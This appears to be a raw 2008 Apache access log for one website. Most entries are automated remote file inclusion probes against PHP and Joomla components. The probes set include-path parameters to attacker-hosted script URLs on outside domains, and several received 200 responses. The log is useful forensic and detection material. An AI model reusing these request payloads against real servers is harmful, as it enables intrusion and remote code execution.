77.79.245.90 - - [12/Sep/2008:09:43:40 -0700] "GET /index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:09:43:42 -0700] "GET /logs/index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:09:44:05 -0700] "GET /logs/access_080615.log/index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:44:06 -0700] "GET /logs/access_080616.log/index.php?skin_file=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:44:07 -0700] "GET /logs/access_080411.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:44:14 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:44:14 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:44:14 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:44:24 -0700] "GET /index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89434 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:32 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:33 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:33 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:33 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:44:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:44:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:44:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:09:44:49 -0700] "GET /protection.php?action=logout&siteurl=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:09:44:49 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:49 -0700] "GET /logs/access_080506.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:49 -0700] "GET /logs/access_080506.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:49 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:50 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:50 -0700] "GET /logs/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:44:50 -0700] "GET /logs/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:44:53 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:44:54 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89439 "-" "libwww-perl/5.811" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:45:05 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:45:06 -0700] "GET /phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:45:10 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:45:39 -0700] "GET /logs/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:45:40 -0700] "GET /!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.47.235 - - [12/Sep/2008:09:45:43 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.borsaimmobiliare.net/images/upload/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.47.235 - - [12/Sep/2008:09:45:48 -0700] "GET /logs/access_080405.log//main.php?sayfa=http://www.borsaimmobiliare.net/images/upload/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:46:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.42.2 - - [12/Sep/2008:09:46:14 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:46:15 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:09:46:24 -0700] "GET /logs/access_080630.log/index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:09:46:25 -0700] "GET /index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89407 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:09:46:26 -0700] "GET /logs/index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:46:29 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:46:29 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:46:31 -0700] "GET /logs/access_080727.log/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:46:32 -0700] "GET /bikes/dteel/?S=D HTTP/1.0" 200 3156 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.9.3.36 - - [12/Sep/2008:09:46:33 -0700] "GET /logs/access_080123.log/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.9.3.5 - - [12/Sep/2008:09:46:34 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.9.3.5 - - [12/Sep/2008:09:46:35 -0700] "GET /logs/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:09:46:36 -0700] "GET /logs/access_080118.log/index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:09:46:51 -0700] "GET /index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:47:08 -0700] "GET ///vwar/backup/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:47:09 -0700] "GET /logs/access_080424.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:47:09 -0700] "GET /logs/access_080424.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:47:15 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [12/Sep/2008:09:47:15 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:09:47:20 -0700] "GET /logs/access_080807.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:09:47:20 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:09:47:21 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:47:59 -0700] "GET /logs/access_080714.log/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:48:01 -0700] "GET /index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89418 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:48:02 -0700] "GET /logs/index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.17.3.26 - - [12/Sep/2008:09:48:40 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chebugis.net/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.147.130 - - [12/Sep/2008:09:49:52 -0700] "GET /inc/functions.inc.php?config[ppa_root_path]=http://kihineh.net/backup/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
125.251.147.130 - - [12/Sep/2008:09:49:52 -0700] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://kihineh.net/backup/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
125.251.147.130 - - [12/Sep/2008:09:49:53 -0700] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.annonce-location.net/admin/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
125.251.147.130 - - [12/Sep/2008:09:49:53 -0700] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.annonce-location.net/admin/classes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.160.109.156 - - [12/Sep/2008:09:49:59 -0700] "GET /logs/access_080506.log%20/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.maisondubailli.org/components/com_zoom/classes/iptc/eid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:50:01 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:50:01 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:50:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:50:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:09:50:06 -0700] "GET /logs/access_080803.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:50:08 -0700] "GET /logs/access_080226.log/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:50:09 -0700] "GET /index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89418 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:10 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:10 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:11 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 500 374 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:50:11 -0700] "GET /logs/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:50:16 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:50:16 -0700] "GET /logs/access_080629.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:50:17 -0700] "GET /index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89028 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:50:19 -0700] "GET /logs/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:50:28 -0700] "GET /logs/access_080310.log/index.php?option=com_gallery&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:50:29 -0700] "GET /index.php?option=com_gallery&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89429 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:50:30 -0700] "GET /logs/index.php?option=com_gallery&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:50:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:50:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:40 -0700] "GET /logs/access_080629.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:40 -0700] "GET /logs/access_080629.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:41 -0700] "GET /index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:41 -0700] "GET /logs/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:42 -0700] "GET /index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89028 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:09:50:42 -0700] "GET /logs/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:45 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:50:48 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:50:50 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
124.9.3.36 - - [12/Sep/2008:09:50:53 -0700] "GET /logs/access_080128.log/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:09:51:19 -0700] "GET /logs/access_080319.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:51:30 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:51:30 -0700] "GET /logs/access_080412.log/index.php?option=com_gallery&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.241 - - [12/Sep/2008:09:51:31 -0700] "GET /logs/access_080321.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:09:51:43 -0700] "GET /logs/access_080316.log/index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:09:51:44 -0700] "GET /index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89449 "-" "libwww-perl/5.65" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:09:51:46 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.227.32 - - [12/Sep/2008:09:51:47 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.227.32 - - [12/Sep/2008:09:51:48 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
